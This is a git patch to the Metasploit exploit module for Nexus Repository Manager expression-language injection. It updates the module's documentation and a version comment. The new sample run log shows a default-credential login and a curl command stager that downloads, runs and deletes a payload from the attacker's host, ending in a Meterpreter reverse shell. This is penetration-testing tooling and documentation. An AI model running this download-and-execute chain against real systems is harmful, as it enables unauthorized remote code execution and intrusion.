From baae9db092a4eaa4e6f3df65d22eded18d5fd20c Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 7 Apr 2020 19:28:37 -0500
Subject: [PATCH] Fix some more things

---
 .../http/nexus_repo_manager_el_injection.md   | 46 +++++++++----------
 .../http/nexus_repo_manager_el_injection.rb   |  2 +-
 2 files changed, 24 insertions(+), 24 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
index f39a17f3f0..9aee577167 100644
--- a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
+++ b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
@@ -8,8 +8,8 @@ as the "nexus" user.
 
 ### Setup
 
-Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.0`
-(note the added `3.21.0` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
+Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1`
+(note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
 
 ### Targets
 
@@ -35,7 +35,7 @@ Set this to a valid Nexus password.
 
 ## Scenarios
 
-### Nexus Repository Manager 3.21.1-05 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
+### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
 
 ```
 msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
@@ -62,31 +62,31 @@ msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
 
 [*] Started reverse TCP handler on 192.168.1.3:4444
 [*] Executing automatic check (disable AutoCheck to override)
-[+] The target appears to be vulnerable. Nexus 3.21.0-05 is a vulnerable version.
+[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
 [*] Logging in with admin:admin
-[+] Logged in with NXSESSIONID=b15d9cfc-f8ad-4aba-b203-c36aa78e4670;
-[*] Using URL: http://0.0.0.0:8080/SjSMKKomKhhGj
-[*] Local IP: http://192.168.1.3:8080/SjSMKKomKhhGj
-[*] Generated command stager: ["curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj", "chmod +x /tmp/dXZVXFXS", "/tmp/dXZVXFXS", "rm -f /tmp/dXZVXFXS"]
-[*] Executing command: curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj
-[*] Client 192.168.1.3 (curl/7.61.1) requested /SjSMKKomKhhGj
+[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
+[*] Using URL: http://0.0.0.0:8080/t6NXrxF
+[*] Local IP: http://192.168.1.3:8080/t6NXrxF
+[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
+[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
 [*] Sending payload to 192.168.1.3 (curl/7.61.1)
-[+] Successfully executed command: curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj
-[*] Command Stager progress -  52.63% done (60/114 bytes)
-[*] Executing command: chmod +x /tmp/dXZVXFXS
-[+] Successfully executed command: chmod +x /tmp/dXZVXFXS
-[*] Command Stager progress -  71.93% done (82/114 bytes)
-[*] Executing command: /tmp/dXZVXFXS
-[+] Successfully executed command: /tmp/dXZVXFXS
-[*] Command Stager progress -  83.33% done (95/114 bytes)
-[*] Executing command: rm -f /tmp/dXZVXFXS
-[+] Successfully executed command: rm -f /tmp/dXZVXFXS
-[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62404) at 2020-04-04 00:39:23 -0500
-[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Command Stager progress -  50.00% done (54/108 bytes)
+[*] Executing command: chmod +x /tmp/hgzeytII
+[+] Successfully executed command: chmod +x /tmp/hgzeytII
+[*] Command Stager progress -  70.37% done (76/108 bytes)
+[*] Executing command: /tmp/hgzeytII
+[+] Successfully executed command: /tmp/hgzeytII
+[*] Command Stager progress -  82.41% done (89/108 bytes)
+[*] Executing command: rm -f /tmp/hgzeytII
+[+] Successfully executed command: rm -f /tmp/hgzeytII
+[*] Command Stager progress - 100.00% done (108/108 bytes)
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
 [*] Server stopped.
 
 meterpreter > getuid
-Server username: no-user @ 5c29594842aa (uid=200, gid=200, euid=200, egid=200)
+Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
 meterpreter > sysinfo
 Computer     : 172.17.0.2
 OS           : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
diff --git a/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb b/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
index 8c8283e25a..b6fcf344a5 100644
--- a/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
+++ b/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Target did not respond with Server header.')
     end
 
-    # Server: Nexus/3.21.0-05 (OSS)
+    # Server: Nexus/3.21.1-01 (OSS)
     version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
 
     unless version